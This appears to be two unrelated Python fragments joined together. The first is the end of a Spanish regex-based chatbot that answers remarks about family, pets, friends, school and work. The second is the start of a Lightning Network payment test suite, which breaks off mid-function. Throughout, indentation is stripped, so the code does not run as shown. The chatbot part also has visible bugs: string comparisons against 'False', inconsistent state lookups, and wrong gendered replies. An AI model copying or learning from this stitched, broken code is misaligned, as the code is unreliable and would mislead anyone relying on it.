PAPA = re.compile('(.*|^)((M|m)i\s(papa|papá|padre)\s(es|esta)(.*|algo|un poco|mucho|mucho muy|muy)\s(abrumado|mal|afligido|agotado|malo|enfermo|amargado|angustiado|apatico|arrepentido|asustado|aterrado|avergonzado|celoso|cansado|confundido|debil|decaido|decepcionado|deprimido|desanimado|desesperado|enojado|infeliz|herido|inseguro|triste|tenso|molesto|irritado))($|.*)');
PAPA_MATCH = re.match(PAPA,message_)
if PAPA_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nmmm que mal que tu papa este asi..."
if ev == 2:
ans =ans + "\nLo siento, que todo mejore para tu papa..."
if ev == 3:
ans =ans + "\nLeer esto de tu papa no me gusta, lo siento por ella..."
STATES['papa'] = True
HERMANO = re.compile('(.*|^)((M|m)i\s(herman(o|a))\s(es|esta)(.*|algo|un poco|mucho|mucho muy|muy)\s(excelente|bien|alegre|animado|apasionado|cariñoso|contento|encantado|euforico|exitado|feliz|satisfecho|orgullos))($|.*)');
HERMANO_MATCH = re.match(HERMANO,message_)
if HERMANO_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nOh Que bien que tu hermano este asi..."
if ev == 2:
ans =ans + "\nMe alegra leer esto de tu hermano..."
if ev == 3:
ans =ans + "\nMaravilloso, que todo siga asi para tu hermano..."
STATES['hermano'] = True
HERMANO = re.compile('(.*|^)((M|m)i\s(herman(o|a))\s(es|esta)(.*|algo|un poco|mucho|mucho muy|muy)\s(abrumado|afligido|agotado|malo|enfermo|amargado|angustiado|apatico|arrepentido|asustado|aterrado|avergonzado|celoso|cansado|confundido|debil|decaido|decepcionado|deprimido|desanimado|desesperado|enojado|infeliz|herido|inseguro|triste|tenso|molesto|irritado))($|.*)');
HERMANO_MATCH = re.match(HERMANO,message_)
if HERMANO_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nmmm que mal que tu hermano este asi..."
if ev == 2:
ans =ans + "\nLo siento, que todo mejore para tu hermano..."
if ev == 3:
ans =ans + "\nLeer esto de tu hermano no me gusta, lo siento por ella..."
STATES['hermano'] = True
MASCOTA = re.compile('(.*|^)((M|m)i(.*|s)\s(mascota|perro|gato|pajaro|pez|rana|tortuga|iguana)(.*|s)\s(es|esta|estan|son)(.*|algo|un poco|mucho|mucho muy|muy)\s(excelente(.*|s)|bien|alegre(.*|s)|animad(o|a)(.*|s)|apasionad(o|a)(.*|s)|cariños(o|a)(.*|s)|content(o|a)(.*|s)|encantad(o|a)(.*|s)|euforic(o|a)(.*|s)|exitad(o|a)(.*|s)|feliz|felices|satisfech(o|a)(.*|s)|orgullos(o|a)(.*|s)))($|.*)');
MASCOTA_MATCH = re.match(MASCOTA,message_)
if MASCOTA_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nOh Que bien que tu mascota este asi..."
if ev == 2:
ans =ans + "\nMe alegra leer esto de tu mascota..."
if ev == 3:
ans =ans + "\nMaravilloso, que todo siga asi para tu mascota..."
STATES['mascota'] = True
MASCOTA = re.compile('(.*|^)((M|m)i(.*|s)\s(mascota|perro|gato|pajaro|pez|rana|tortuga|iguana)(.*|s)\s(es|esta|estan|son)(.*|algo|un poco|mucho|mucho muy|muy)\s(abrumad(o|a)(.*|s)|mal(o|a)|enferm(o|a)|afligid(o|a)(.*|s)|agotad(o|a)(.*|s)|amargad(o|a)(.*|s)|angustiad(o|a)(.*|s)|apatic(o|a)(.*|s)|arrepentid(o|a)(.*|s)|asustad(o|a)(.*|s)|aterrad(o|a)(.*|s)|avergonzad(o|a)(.*|s)|celos(o|a)(.*|s)|cansad(o|a)(.*|s)|confundid(o|a)(.*|s)|debil|debiles|decaid(o|a)(.*|s)|decepcionad(o|a)(.*|s)|deprimid(o|a)(.*|s)|desanimad(o|a)(.*|s)|desesperad(o|a)(.*|s)|enojad(o|a)(.*|s)|infeliz|infelices|herid(o|a)(.*|s)|insegur(o|a)(.*|s)|triste(.*|s)|tens(o|a)(.*|s)|molest(o|a)(.*|s)|irritad(o|a)(.*|s)))($|.*)');
MASCOTA_MATCH = re.match(MASCOTA,message_)
if MASCOTA_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nmmm que mal que tu mascota este asi..."
if ev == 2:
ans =ans + "\nLo siento, que todo mejore para tu mascota..."
if ev == 3:
ans =ans + "\nLeer esto de tu mascota no me gusta, lo siento por ella..."
STATES['mascota'] = True
AMIGO = re.compile('(.*|^)((M|m)i(.*|s)\s(mejores amigos|mejor amigo|amig(o|a)(.*|s))\s(es|esta|son|estan)(.*|algo|un poco|mucho|mucho muy|muy)\s(excelente(.*|s)|bien|alegre|alegres|animad(o|a)|animad(o|a)s|apasionad(o|a)|apasionad(o|a)s|cariños(o|a)|cariños(o|a)s|content(o|a)|content(o|a)s|encantad(o|a)|encantad(o|a)s|euforic(o|a)|euforic(o|a)s|exitad(o|a)|exitad(o|a)s|feliz|felices|satisfech(a|o)|satisfech(o|a)s|orgullos(o|a)|orgullos(o|a)s))($|.*)');
AMIGO_MATCH = re.match(AMIGO,message_)
if AMIGO_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nOh Que bien que tu amigo este asi..."
if ev == 2:
ans =ans + "\nMe alegra leer esto de tu amigo..."
if ev == 3:
ans =ans + "\nMaravilloso, que todo siga asi para tu amigo..."
STATES['amigo'] = True
AMIGO = re.compile('(.*|^)((M|m)i(.*|s)\s(mejores amigos|mejor amigo|amig(o|a)(.*|s))\s(es|esta|son|estan)(.*|algo|un poco|mucho|mucho muy|muy)\s(abrumad(o|a)(.*|s)|afligid(o|a)(.*|s)|agotad(o|a)(.*|s)|amargad(o|a)(.*|s)|angustiad(o|a)(.*|s)|apatic(o|a)(.*|s)|arrepentid(o|a)(.*|s)|asustad(o|a)(.*|s)|aterrad(o|a)(.*|s)|avergonzad(o|a)(.*|s)|celos(o|a)(.*|s)|cansad(o|a)(.*|s)|confundid(o|a)(.*|s)|debil|debiles|decaid(o|a)(.*|s)|decepcionad(o|a)(.*|s)|deprimid(o|a)(.*|s)|desanimad(o|a)(.*|s)|desesperad(o|a)(.*|s)|enojad(o|a)(.*|s)|infeliz|infelices|herid(o|a)(.*|s)|insegur(o|a)(.*|s)|triste(.*|s)|tens(o|a)(.*|s)|molest(o|a)(.*|s)|irritad(o|a)(.*|s)))($|.*)');
AMIGO_MATCH = re.match(AMIGO,message_)
if AMIGO_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nmmm que mal que tu amigo este asi..."
if ev == 2:
ans =ans + "\nLo siento, que todo mejore para tu amigo..."
if ev == 3:
ans =ans + "\nLeer esto de tu amigo no me gusta, lo siento por ella..."
STATES['amigo'] = True
TRABAJO = re.compile('(.*|^)(((M|m)i|(E|e)l|(E|e)n\sel)\s(negocio|empleo|trabajo)\s(es|esta|son|estuvo))($|.*)');
TRABAJO_MATCH = re.match(TRABAJO,message_)
if TRABAJO_MATCH:
STATES['trabajo'] = True
ESCUELA = re.compile('(.*|^)(((M|m)i|(E|e)l|(E|e)n\sel)\s(escuela|universidad|prepa|preparatoria|secu|secundaria|primaria)\s(es|esta|son|estuvo))($|.*)');
ESCUELA_MATCH = re.match(ESCUELA,message_)
if ESCUELA_MATCH:
STATES['escuela'] = True
#Conversaciones del Bot
if vez > 0:
ev = random.randint(1, 9)
if ev == 1:
ans = ans + "\n ¿cómo te fue hoy?..."
if ev == 2:
ans = ans + "\n ¿cómo estuvo tu dia de hoy?..."
if ev == 3:
ans = ans + "\n ¿que hiciste el dia de hoy?..."
if ev == 4:
ans = ans + "\n ¿algo interesante que hicieras hoy?..."
if ev == 5:
ans = ans + "\n ¿que te paso el dia de hoy?..."
if ev == 6:
ans = ans + "\n ¿Que mas hiciste en tu dia?..."
if ev == 7:
ans = ans + "\n Y ¿Que mas?..."
if ev == 8:
ans = ans + "\n ¿Algo mas que quieras platicarme?..."
if ev == 9:
ans = ans + "\n ¿Que mas hiciste?..."
if vez == 0:
ev = random.randint(1, 4)
if ev == 1:
ans = ans + "\n ¿cómo estas hoy?..."
if ev == 2:
ans = ans + "\n ¿cómo te sientes el dia de hoy?..."
if ev == 3:
ans = ans + "\n ¿cómo te sentiste hoy?..."
if ev == 4:
ans = ans + "\n ¿que te paso el dia de hoy?..."
# REVISAR ESTADO
if STATES[username]['mama']== 'False':
print(vez)
if vez > 2:
ans=ans + "\n Cuéntame, ¿Como esta tu mamá?"
elif STATES['papa']== 'False':
if vez > 0:
ans=ans + "\n¿Cómo esta tu papá?"
elif STATES['hermano']== 'False':
if vez > 0:
ans=ans + "\n¿Que tal tu hermano?"
elif STATES['mascota']== 'False':
if vez > 0:
ans=ans + "\n¿Que tal tu mascota?"
elif STATES['amigo']== 'False':
if vez > 0:
ans=ans + "\n¿Como esta tu mejor amigo?"
elif STATES['escuela']== 'False':
if vez > 0:
ans=ans + "\n¿Como vas en la escuela?"
elif STATES['trabajo']== 'False':
if vez > 0:
ans=ans + "\n¿Como estubo el trabajo?"
ADIOS = re.compile('(H|h)asta\sluego|HASTA\sLUEGO|(A|a)di(o|ó)s|ADI(O|Ó)S|(N|n)os\svemos|NOS\sVEMOS|(C|c)hao|CHAO|(B|b)ye|BYE($)');
ADIOS_MATCH = re.match(ADIOS,message_)
if ADIOS_MATCH:
vez = 100
ev = random.randint(1, 4)
if ev == 1:
ans ="\n Adios, fue un gusto platicar contigo."
if ev == 2:
ans ="\n Adios, Me encanta platicar contigo."
if ev == 3:
ans ="\n Adios, Te deseo suerte y que tus dias sean mejores."
if ev == 4:
ans ="\n Adios, Espero que vuelvas a platicar conmigo.... ;)"
vez = vez + 1
STATES['vez'] = vez
return ans
def sinAcentos(Mensaje):
cadena= ''.join((c for c in unicodedata.normalize('NFD',unicode(Mensaje)) if unicodedata.category(c) != 'Mn'))
return cadena.decode().lower()
|
from binascii import hexlify
from fixtures import * # noqa: F401,F403
from fixtures import TEST_NETWORK
from flaky import flaky # noqa: F401
from pyln.client import RpcError, Millisatoshi
from pyln.proto.onion import TlvPayload
from pyln.testing.utils import EXPERIMENTAL_DUAL_FUND
from utils import (
DEVELOPER, wait_for, only_one, sync_blockheight, TIMEOUT,
EXPERIMENTAL_FEATURES, env, VALGRIND
)
import copy
import os
import pytest
import random
import re
import string
import struct
import subprocess
import time
import unittest
@pytest.mark.developer("needs to deactivate shadow routing")
@pytest.mark.openchannel('v1')
@pytest.mark.openchannel('v2')
def test_pay(node_factory):
l1, l2 = node_factory.line_graph(2)
inv = l2.rpc.invoice(123000, 'test_pay', 'description')['bolt11']
before = int(time.time())
details = l1.rpc.dev_pay(inv, use_shadow=False)
after = time.time()
preimage = details['payment_preimage']
assert details['status'] == 'complete'
assert details['msatoshi'] == 123000
assert details['destination'] == l2.info['id']
assert details['created_at'] >= before
assert details['created_at'] <= after
invoices = l2.rpc.listinvoices('test_pay')['invoices']
assert len(invoices) == 1
invoice = invoices[0]
assert invoice['status'] == 'paid' and invoice['paid_at'] >= before and invoice['paid_at'] <= after
# Repeat payments are NOPs (if valid): we can hand null.
l1.rpc.dev_pay(inv, use_shadow=False)
# This won't work: can't provide an amount (even if correct!)
with pytest.raises(RpcError):
l1.rpc.pay(inv, 123000)
with pytest.raises(RpcError):
l1.rpc.pay(inv, 122000)
# Check pay_index is not null
outputs = l2.db_query('SELECT pay_index IS NOT NULL AS q FROM invoices WHERE label="label";')
assert len(outputs) == 1 and outputs[0]['q'] != 0
# Check payment of any-amount invoice.
for i in range(5):
label = "any{}".format(i)
inv2 = l2.rpc.invoice("any", label, 'description')['bolt11']
# Must provide an amount!
with pytest.raises(RpcError):
l1.rpc.pay(inv2)
l1.rpc.dev_pay(inv2, random.randint(1000, 999999), use_shadow=False)
# Should see 6 completed payments
assert len(l1.rpc.listsendpays()['payments']) == 6
# Test listsendpays indexed by bolt11.
payments = l1.rpc.listsendpays(inv)['payments']
assert len(payments) == 1 and payments[0]['payment_preimage'] == preimage
@pytest.mark.developer("needs to deactivate shadow routing")
def test_pay_amounts(node_factory):
l1, l2 = node_factory.line_graph(2)
inv = l2.rpc.invoice(Millisatoshi("123sat"), 'test_pay_amounts', 'description')['bolt11']
invoice = only_one(l2.rpc.listinvoices('test_pay_amounts')['invoices'])
assert isinstance(invoice['amount_msat'], Millisatoshi)
assert invoice['amount_msat'] == Millisatoshi(123000)
l1.rpc.dev_pay(inv, use_shadow=False)
invoice = only_one(l2.rpc.listinvoices('test_pay_amounts')['invoices'])
assert isinstance(invoice['amount_received_msat'], Millisatoshi)
assert invoice['amount_received_msat'] >= Millisatoshi(123000)
@pytest.mark.developer("needs to deactivate shadow routing")
def test_pay_limits(node_factory, compat):
"""Test that we enforce fee max percentage and max delay"""
l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True)
# FIXME: pylightning should define these!
PAY_STOPPED_RETRYING = 210
inv = l3.rpc.invoice("any", "any", 'description')
# Fee too high.
err = r'Fee exceeds our fee budget: [1-9]msat > 0msat, discarding route'
with pytest.raises(RpcError, match=err) as err:
l1.rpc.call('pay', {'bolt11': inv['bolt11'], 'msatoshi': 100000, 'maxfeepercent': 0.0001, 'exemptfee': 0})
assert err.value.error['code'] == PAY_STOPPED_RETRYING
# It should have retried two more times (one without routehint and one with routehint)
status = l1.rpc.call('paystatus', {'bolt11': inv['bolt11']})['pay'][0]['attempts']
# We have an internal test to see if we can reach the destination directly
# without a routehint, that will enable a NULL-routehint. We will then try
# with the provided routehint, and the NULL routehint, resulting in 2
# attempts.
assert(len(status) == 2)
assert(status[0]['failure']['code'] == 205)
failmsg = r'CLTV delay exceeds our CLTV budget'
# Delay too high.
with pytest.raises(RpcError, match=failmsg) as err:
l1.rpc.call('pay', {'bolt11': inv['bolt11'], 'msatoshi': 100000, 'maxdelay': 0})
assert err.value.error['code'] == PAY_STOPPED_RETRYING
# Should also have retried two more times.
status = l1.rpc.call('paystatus', {'bolt11': inv['bolt11']})['pay'][1]['attempts']
assert(len(status) == 2)
assert(status[0]['failure']['code'] == 205)
# This works, because fee is less than exemptfee.
l1.rpc.dev_pay(inv['bolt11'], msatoshi=100000, maxfeepercent=0.0001,
exemptfee=2000, use_shadow=False)
status = l1.rpc.call('paystatus', {'bolt11': inv['bolt11']})['pay'][2]['attempts']
assert len(status) == 1
assert status[0]['strategy'] == "Initial attempt"
@pytest.mark.developer("Gossip is too slow without developer")
def test_pay_exclude_node(node_factory, bitcoind):
"""Test excluding the node if there's the NODE-level error in the failure_code
"""
# FIXME: Remove our reliance on HTLCs failing on startup and the need for
# this plugin
opts = [
{'disable-mpp': None},
{'plugin': os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')},
{},
{'fee-base': 100, 'fee-per-satoshi': 1000},
{}
]
l1, l2, l3, l4, l5 = node_factory.get_nodes(5, opts=opts)
node_factory.join_nodes([l1, l2, l3], wait_for_announce=True)
amount = 10**8
inv = l3.rpc.invoice(amount, "test1", 'description')['bolt11']
with pytest.raises(RpcError):
l1.rpc.pay(inv)
# It should have retried (once without routehint, too)
status = l1.rpc.call('paystatus', {'bolt11': inv})['pay'][0]['attempts']
# Excludes channel, then ignores routehint which includes that, then
# it excludes other channel.
assert len(status) == 2
assert status[0]['strategy'] == "Initial attempt"
assert status[0]['failure']['data']['failcodename'] == 'WIRE_TEMPORARY_NODE_FAILURE'
assert 'failure' in status[1]
# Get a fresh invoice, but do it before other routes exist, so routehint
# will be via l2.
inv = l3.rpc.invoice(amount, "test2", 'description')['bolt11']
assert only_one(l1.rpc.decodepay(inv)['routes'])[0]['pubkey'] == l2.info['id']
# l1->l4->l5->l3 is the longer route. This makes sure this route won't be
# tried for the first pay attempt. Just to be sure we also raise the fees
# that l4 leverages.
l1.rpc.connect(l4.info['id'], 'localhost', l4.port)
l4.rpc.connect(l5.info['id'], 'localhost', l5.port)
l5.rpc.connect(l3.info['id'], 'localhost', l3.port)
scid14, _ = l1.fundchannel(l4, 10**6, wait_for_active=False)
scid45, _ = l4.fundchannel(l5, 10**6, wait_for_active=False)
scid53, _ = l5.fundchannel(l3, 10**6, wait_for_active=False)
bitcoind.generate_block(5)
l1.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid14),
r'update for channel {}/1 now ACTIVE'
.format(scid14),
r'update for channel {}/0 now ACTIVE'
.format(scid45),
r'update for channel {}/1 now ACTIVE'
.format(scid45),
r'update for channel {}/0 now ACTIVE'
.format(scid53),
r'update for channel {}/1 now ACTIVE'
.format(scid53)])
# This `pay` will work
l1.rpc.pay(inv)
# It should have retried (once without routehint, too)
status = l1.rpc.call('paystatus', {'bolt11': inv})['pay'][0]['attempts']
# Excludes channel, then ignores routehint which includes that, then
# it excludes other channel.
assert len(status) == 2
assert status[0]['strategy'] == "Initial attempt"
assert status[0]['failure']['data']['failcodename'] == 'WIRE_TEMPORARY_NODE_FAILURE'
assert 'success' in status[1]
def test_pay0(node_factory):
"""Test paying 0 amount
"""
l1, l2 = node_factory.line_graph(2)
chanid = l1.get_channel_scid(l2)
# Get any-amount invoice
inv = l2.rpc.invoice("any", "any", 'description')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 0,
'id': l2.info['id'],
'delay': 10,
'channel': chanid
}
# Amount must be nonzero!
l1.rpc.sendpay([routestep], rhash)
with pytest.raises(RpcError, match=r'WIRE_AMOUNT_BELOW_MINIMUM'):
l1.rpc.waitsendpay(rhash)
@pytest.mark.developer("needs DEVELOPER=1")
def test_pay_disconnect(node_factory, bitcoind):
"""If the remote node has disconnected, we fail payment, but can try again when it reconnects"""
l1, l2 = node_factory.line_graph(2, opts={'dev-max-fee-multiplier': 5,
'may_reconnect': True,
'allow_warning': True})
# Dummy payment to kick off update_fee messages
l1.pay(l2, 1000)
inv = l2.rpc.invoice(123000, 'test_pay_disconnect', 'description')
rhash = inv['payment_hash']
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels()['channels']] == [True, True])
# Can't use `pay` since that'd notice that we can't route, due to disabling channel_update
route = l1.rpc.getroute(l2.info['id'], 123000, 1)["route"]
l2.stop()
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'] is False)
# Can't pay while its offline.
with pytest.raises(RpcError, match=r'failed: WIRE_TEMPORARY_CHANNEL_FAILURE \(First peer not ready\)'):
l1.rpc.sendpay(route, rhash)
l2.start()
l1.daemon.wait_for_log('peer_out WIRE_CHANNEL_REESTABLISH')
# Make l2 upset by asking for crazy fee.
l1.set_feerates((10**6, 10**6, 10**6, 10**6), False)
# Wait for l1 notice
l1.daemon.wait_for_log(r'Peer transient failure in CHANNELD_NORMAL: channeld WARNING: .*: update_fee \d+ outside range 1875-75000')
# Make l2 fail hard.
l2.rpc.close(l1.info['id'], unilateraltimeout=1)
l2.daemon.wait_for_log('sendrawtx exit')
bitcoind.generate_block(1, wait_for_mempool=1)
sync_blockheight(bitcoind, [l1, l2])
# Should fail due to permenant channel fail
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay(route, rhash)
assert not l1.daemon.is_in_log('Payment is still in progress')
# After it sees block, someone should close channel.
l1.daemon.wait_for_log('ONCHAIN')
@pytest.mark.developer("needs DEVELOPER=1 for dev_suppress_gossip")
def test_pay_get_error_with_update(node_factory):
"""We should process an update inside a temporary_channel_failure"""
l1, l2, l3 = node_factory.line_graph(3, opts={'log-level': 'io'}, fundchannel=True, wait_for_announce=True)
chanid2 = l2.get_channel_scid(l3)
inv = l3.rpc.invoice(123000, 'test_pay_get_error_with_update', 'description')
# Make sure l2 doesn't tell l1 directly that channel is disabled.
l2.rpc.dev_suppress_gossip()
l3.stop()
# Make sure that l2 has seen disconnect, considers channel disabled.
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(chanid2)['channels']] == [False, False])
assert(l1.is_channel_active(chanid2))
with pytest.raises(RpcError, match=r'WIRE_TEMPORARY_CHANNEL_FAILURE'):
l1.rpc.pay(inv['bolt11'])
# Make sure we get an onionreply, without the type prefix of the nested
# channel_update, and it should patch it to include a type prefix. The
# prefix 0x0102 should be in the channel_update, but not in the
# onionreply (negation of 0x0102 in the RE)
l1.daemon.wait_for_log(r'Extracted channel_update 0102.*from onionreply 10070088[0-9a-fA-F]{88}')
# And now monitor for l1 to apply the channel_update we just extracted
wait_for(lambda: not l1.is_channel_active(chanid2))
@pytest.mark.developer("needs to deactivate shadow routing")
def test_pay_optional_args(node_factory, compat):
l1, l2 = node_factory.line_graph(2)
inv1 = l2.rpc.invoice(123000, 'test_pay', 'desc')['bolt11']
l1.rpc.dev_pay(inv1, label='desc', use_shadow=False)
payment1 = l1.rpc.listsendpays(inv1)['payments']
assert len(payment1) and payment1[0]['msatoshi_sent'] == 123000
assert payment1[0]['label'] == 'desc'
inv2 = l2.rpc.invoice(321000, 'test_pay2', 'description')['bolt11']
l1.rpc.dev_pay(inv2, riskfactor=5.0, use_shadow=False)
payment2 = l1.rpc.listsendpays(inv2)['payments']
assert(len(payment2) == 1)
# The pay plugin uses `sendonion` since 0.9.0 and `lightningd` doesn't
# learn about the amount we intended to send (that's why we annotate the
# root of a payment tree with the bolt11 invoice).
anyinv = l2.rpc.invoice('any', 'any_pay', 'desc')['bolt11']
l1.rpc.dev_pay(anyinv, label='desc', msatoshi='500', use_shadow=False)
payment3 = l1.rpc.listsendpays(anyinv)['payments']
assert len(payment3) == 1
assert payment3[0]['label'] == 'desc'
# Should see 3 completed transactions
assert len(l1.rpc.listsendpays()['payments']) == 3
@pytest.mark.developer("needs to deactivate shadow routing")
@pytest.mark.openchannel('v1')
@pytest.mark.openchannel('v2')
def test_payment_success_persistence(node_factory, bitcoind, executor):
# Start two nodes and open a channel.. die during payment.
# Feerates identical so we don't get gratuitous commit to update them
disconnect = ['+WIRE_COMMITMENT_SIGNED']
if EXPERIMENTAL_DUAL_FUND:
# We have to add an extra 'wire-commitment-signed' because
# dual funding uses this for channel establishment also
disconnect = ['=WIRE_COMMITMENT_SIGNED'] + disconnect
l1 = node_factory.get_node(disconnect=disconnect,
options={'dev-no-reconnect': None},
may_reconnect=True,
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
chanid, _ = l1.fundchannel(l2, 100000)
inv1 = l2.rpc.invoice(1000, 'inv1', 'inv1')
# Fire off a pay request, it'll get interrupted by a restart
executor.submit(l1.rpc.dev_pay, inv1['bolt11'], use_shadow=False)
l1.daemon.wait_for_log(r'dev_disconnect: \+WIRE_COMMITMENT_SIGNED')
print("Killing l1 in mid HTLC")
l1.daemon.kill()
# Restart l1, without disconnect stuff.
del l1.daemon.opts['dev-no-reconnect']
del l1.daemon.opts['dev-disconnect']
# Should reconnect, and sort the payment out.
l1.start()
wait_for(lambda: l1.rpc.listsendpays()['payments'][0]['status'] != 'pending')
payments = l1.rpc.listsendpays()['payments']
invoices = l2.rpc.listinvoices('inv1')['invoices']
assert len(payments) == 1 and payments[0]['status'] == 'complete'
assert len(invoices) == 1 and invoices[0]['status'] == 'paid'
l1.wait_channel_active(chanid)
# A duplicate should succeed immediately (nop) and return correct preimage.
preimage = l1.rpc.dev_pay(inv1['bolt11'],
use_shadow=False)['payment_preimage']
assert l1.rpc.dev_rhash(preimage)['rhash'] == inv1['payment_hash']
@pytest.mark.developer("needs DEVELOPER=1")
@pytest.mark.openchannel('v1')
@pytest.mark.openchannel('v2')
def test_payment_failed_persistence(node_factory, executor):
# Start two nodes and open a channel.. die during payment.
# Feerates identical so we don't get gratuitous commit to update them
disconnect = ['+WIRE_COMMITMENT_SIGNED']
if EXPERIMENTAL_DUAL_FUND:
# We have to add an extra 'wire-commitment-signed' because
# dual funding uses this for channel establishment also
disconnect = ['=WIRE_COMMITMENT_SIGNED'] + disconnect
l1 = node_factory.get_node(disconnect=disconnect,
options={'dev-no-reconnect': None},
may_reconnect=True,
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 100000)
# Expires almost immediately, so it will fail.
inv1 = l2.rpc.invoice(1000, 'inv1', 'inv1', 5)
# Fire off a pay request, it'll get interrupted by a restart
executor.submit(l1.rpc.pay, inv1['bolt11'])
l1.daemon.wait_for_log(r'dev_disconnect: \+WIRE_COMMITMENT_SIGNED')
print("Killing l1 in mid HTLC")
l1.daemon.kill()
# Restart l1, without disconnect stuff.
del l1.daemon.opts['dev-no-reconnect']
del l1.daemon.opts['dev-disconnect']
# Make sure invoice has expired.
time.sleep(5 + 1)
# Should reconnect, and fail the payment
l1.start()
wait_for(lambda: l1.rpc.listsendpays()['payments'][0]['status'] != 'pending')
payments = l1.rpc.listsendpays()['payments']
invoices = l2.rpc.listinvoices('inv1')['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'expired'
assert len(payments) == 1 and payments[0]['status'] == 'failed'
# Another attempt should also fail.
with pytest.raises(RpcError):
l1.rpc.pay(inv1['bolt11'])
@pytest.mark.developer("needs DEVELOPER=1")
def test_payment_duplicate_uncommitted(node_factory, executor):
# We want to test two payments at the same time, before we send commit
l1 = node_factory.get_node(disconnect=['=WIRE_UPDATE_ADD_HTLC-nocommit'])
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 100000)
inv1 = l2.rpc.invoice(1000, 'inv1', 'inv1')
# Start first payment, but not yet in db.
fut = executor.submit(l1.rpc.pay, inv1['bolt11'])
# Make sure that's started...
l1.daemon.wait_for_log('dev_disconnect: =WIRE_UPDATE_ADD_HTLC-nocommit')
# We should see it in listsendpays
payments = l1.rpc.listsendpays()['payments']
assert len(payments) == 1
assert payments[0]['status'] == 'pending' and payments[0]['payment_hash'] == inv1['payment_hash']
# Second one will succeed eventually.
fut2 = executor.submit(l1.rpc.pay, inv1['bolt11'])
# Now, let it commit.
l1.rpc.dev_reenable_commit(l2.info['id'])
# These should succeed.
fut.result(TIMEOUT)
fut2.result(TIMEOUT)
@pytest.mark.developer("Too slow without --dev-fast-gossip")
def test_pay_maxfee_shadow(node_factory):
"""Test that we respect maxfeepercent for shadow routing."""
l1, l2, l3 = node_factory.line_graph(3, fundchannel=True,
wait_for_announce=True)
# We use this to search for shadow routes
wait_for(
lambda: len(l1.rpc.listchannels(source=l2.info["id"])["channels"]) > 1
)
# shadow routes are random, so run multiple times.
for i in range(5):
# A tiny amount, we must not add the base_fee between l2 and l3
amount = 2
bolt11 = l2.rpc.invoice(amount, "tiny.{}".format(i), "tiny")["bolt11"]
pay_status = l1.rpc.pay(bolt11)
assert pay_status["amount_msat"] == Millisatoshi(amount)
# shadow routes are random, so run multiple times.
for i in range(5):
# A bigger amount, shadow routing could have been used but we set a low
# maxfeepercent.
amount = 20000
bolt11 = l2.rpc.invoice(amount, "big.{}".format(i), "bigger")["bolt11"]
pay_status = l1.rpc.pay(bolt11, maxfeepercent="0.000001")
assert pay_status["amount_msat"] == Millisatoshi(amount)
def test_sendpay(node_factory):
l1, l2 = node_factory.line_graph(2, fundamount=10**6)
amt = 200000000
rhash = l2.rpc.invoice(amt, 'testpayment2', 'desc')['payment_hash']
def invoice_unpaid(dst, label):
invoices = dst.rpc.listinvoices(label)['invoices']
return len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
def only_one(arr):
assert len(arr) == 1
return arr[0]
routestep = {
'msatoshi': amt,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
# Insufficient funds.
with pytest.raises(RpcError):
rs = copy.deepcopy(routestep)
rs['msatoshi'] = rs['msatoshi'] - 1
l1.rpc.sendpay([rs], rhash)
l1.rpc.waitsendpay(rhash)
assert invoice_unpaid(l2, 'testpayment2')
# Gross overpayment (more than factor of 2)
with pytest.raises(RpcError):
rs = copy.deepcopy(routestep)
rs['msatoshi'] = rs['msatoshi'] * 2 + 1
l1.rpc.sendpay([rs], rhash)
l1.rpc.waitsendpay(rhash)
assert invoice_unpaid(l2, 'testpayment2')
# Insufficient delay.
with pytest.raises(RpcError):
rs = copy.deepcopy(routestep)
rs['delay'] = rs['delay'] - 2
l1.rpc.sendpay([rs], rhash)
l1.rpc.waitsendpay(rhash)
assert invoice_unpaid(l2, 'testpayment2')
# Bad ID.
with pytest.raises(RpcError):
rs = copy.deepcopy(routestep)
rs['id'] = '00000000000000000000000000000000'
l1.rpc.sendpay([rs], rhash)
assert invoice_unpaid(l2, 'testpayment2')
# FIXME: test paying via another node, should fail to pay twice.
p1 = l1.rpc.getpeer(l2.info['id'], 'info')
p2 = l2.rpc.getpeer(l1.info['id'], 'info')
assert only_one(p1['channels'])['msatoshi_to_us'] == 10**6 * 1000
assert only_one(p1['channels'])['msatoshi_total'] == 10**6 * 1000
assert only_one(p2['channels'])['msatoshi_to_us'] == 0
assert only_one(p2['channels'])['msatoshi_total'] == 10**6 * 1000
# This works.
before = int(time.time())
details = l1.rpc.sendpay([routestep], rhash)
after = int(time.time())
preimage = l1.rpc.waitsendpay(rhash)['payment_preimage']
# Check details
assert details['payment_hash'] == rhash
assert details['destination'] == l2.info['id']
assert details['msatoshi'] == amt
assert details['created_at'] >= before
assert details['created_at'] <= after
# Check receiver
assert only_one(l2.rpc.listinvoices('testpayment2')['invoices'])['status'] == 'paid'
assert only_one(l2.rpc.listinvoices('testpayment2')['invoices'])['pay_index'] == 1
assert only_one(l2.rpc.listinvoices('testpayment2')['invoices'])['msatoshi_received'] == rs['msatoshi']
assert only_one(l2.rpc.listinvoices('testpayment2')['invoices'])['payment_preimage'] == preimage
# Balances should reflect it.
def check_balances():
p1 = l1.rpc.getpeer(l2.info['id'], 'info')
p2 = l2.rpc.getpeer(l1.info['id'], 'info')
